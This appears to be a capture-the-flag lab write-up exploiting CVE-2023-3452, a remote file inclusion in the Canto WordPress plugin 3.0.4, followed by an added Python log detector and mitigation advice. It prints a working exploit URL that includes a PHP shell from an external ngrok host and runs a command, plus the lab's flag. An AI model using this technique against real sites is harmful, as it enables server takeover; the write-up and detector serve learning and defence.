On-Premise-01: Vulnerable Canto WordPress Plugin

Challenge Description: Secure Corp integrates the Canto plugin for WordPress to manage its digital assets and streamline workflows. The plugin facilitates importing and managing images and other assets directly from the browser, using metadata and automation features. During your investigation, you identify an unusual behavior in the plugin’s handling of remote requests. This behavior could enable attackers to include and execute unauthorized code, provided certain conditions are met. Your task is to exploit this flaw to compromise the server and demonstrate the risk.

  • The lab description mentioned the use of the Canto plugin. I did some recon and found that an RCE is present in a certain version of Canto (CVE-2023-3452).

  • Further recon helped me identify that the plugin is located at /wp-content/plugins/canto

  • Found the readme file at /wp-content/plugins/canto/readme.txt

  • From the readme file I found that the version in use is Stable tag: 3.0.4, which confirms that this RCE vulnerability is present.

  • From the CVE listing and other sources I found that the vulnerability is caused by this line in the plugin's download.php file:

require_once($_REQUEST['wp_abspath'] . '/wp-admin/admin.php');

  • The wp_abspath parameter is user controlled, which allows remote inclusion of PHP code when allow_url_include is enabled.

  • To exploit it, I created a directory named wp-admin and a file inside it named admin.php containing a simple PHP shell.

  • Started a Python HTTP server and exposed it publicly via ngrok.

  • Supplied the link to the challenge page: https://red.infinity.cyberwarfare.live/r24f5e32785d4e01b57a457f0e4330fx/wp-content/plugins/canto/includes/lib/download.php?wp_abspath=https://37a4b3d1479f.ngrok-free.app&cmd=ls

RCE found. I then tried traversing directories to find flag.txt, which is present in the root directory.
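As an added example that is not part of this writeup or of the Canto plugin's own code, the Python below shows how a defender would spot the request pattern used above in web-server access logs: a hit on the vulnerable download.php whose wp_abspath value is a remote URL, a PHP stream wrapper, or a directory-traversal sequence. The log lines are constructed for the example, the IPs and the attacker.example hostname are placeholders, and the combined-log-format regex is an assumption about how the server logs requests.

```python
"""
Detect attempts to abuse the Canto plugin's download.php remote file
inclusion (CVE-2023-3452) in web-server access logs.
Added example, not part of the original writeup or the plugin.
"""
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumed Apache/nginx combined-log-format layout (assumption).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# The vulnerable endpoint named in the writeup.
VULN_PATH = "/wp-content/plugins/canto/includes/lib/download.php"

# wp_abspath values that can only mean inclusion of attacker-chosen code:
# remote URLs and PHP stream wrappers (allow_url_include) or data: URIs.
SUSPICIOUS_SCHEME = re.compile(
    r'^\s*(https?|ftps?|php|data|expect|phar)://|^\s*data:', re.IGNORECASE
)


def classify_wp_abspath(value: str) -> str:
    """Return 'remote', 'traversal' or 'benign' for one wp_abspath value."""
    # Decode once more in case the value was double-encoded to evade filters;
    # over-decoding is acceptable for detection, not for enforcement.
    v = unquote(value)
    if SUSPICIOUS_SCHEME.search(v):
        return "remote"
    if ".." in v.replace("\\", "/").split("/"):
        return "traversal"
    return "benign"


def analyse_line(line: str):
    """Parse one access-log line; return a finding dict or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not parts.path.endswith(VULN_PATH):  # only the vulnerable endpoint
        return None
    params = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes
    for value in params.get("wp_abspath", []):
        verdict = classify_wp_abspath(value)
        if verdict != "benign":
            return {
                "ip": m.group("ip"),
                "time": m.group("ts"),
                "verdict": verdict,
                "wp_abspath": unquote(value),
                # Other parameters (e.g. cmd) hint at what the included file expects.
                "extra_params": sorted(k for k in params if k != "wp_abspath"),
                "status": int(m.group("status")),
            }
    return None


def scan(lines):
    """Run analyse_line over an iterable of log lines, keeping only findings."""
    return [f for f in (analyse_line(line) for line in lines) if f]


# Constructed sample log: one remote-inclusion attempt, one legitimate-looking
# local path, one traversal attempt, and two unrelated requests.
SAMPLE_LOG = [
    '203.0.113.10 - - [12/Jan/2025:10:15:01 +0000] "GET /wp-content/plugins/canto/includes/lib/download.php?wp_abspath=https%3A%2F%2Fattacker.example&cmd=ls HTTP/1.1" 200 512',
    '198.51.100.7 - - [12/Jan/2025:10:15:05 +0000] "GET /wp-content/plugins/canto/includes/lib/download.php?wp_abspath=%2Fvar%2Fwww%2Fhtml&id=42 HTTP/1.1" 200 8192',
    '203.0.113.10 - - [12/Jan/2025:10:16:40 +0000] "GET /wp-content/plugins/canto/includes/lib/download.php?wp_abspath=..%2F..%2F..%2Ftmp HTTP/1.1" 500 0',
    '192.0.2.5 - - [12/Jan/2025:10:17:00 +0000] "GET /wp-content/plugins/canto/readme.txt HTTP/1.1" 200 2048',
    '192.0.2.5 - - [12/Jan/2025:10:17:03 +0000] "GET /index.php?wp_abspath=https://example.net HTTP/1.1" 404 100',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A matching finding with status 200 and an extra parameter such as cmd is a strong sign the include succeeded, so it should trigger incident response rather than just a ticket. The detection is a stopgap: the actual mitigation is to update the plugin past 3.0.4, keep allow_url_include off in php.ini, and never derive an include path from request input.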

Flag = CWL{m@n@g3_y0uR_D1g1t@L_A$$3t5}
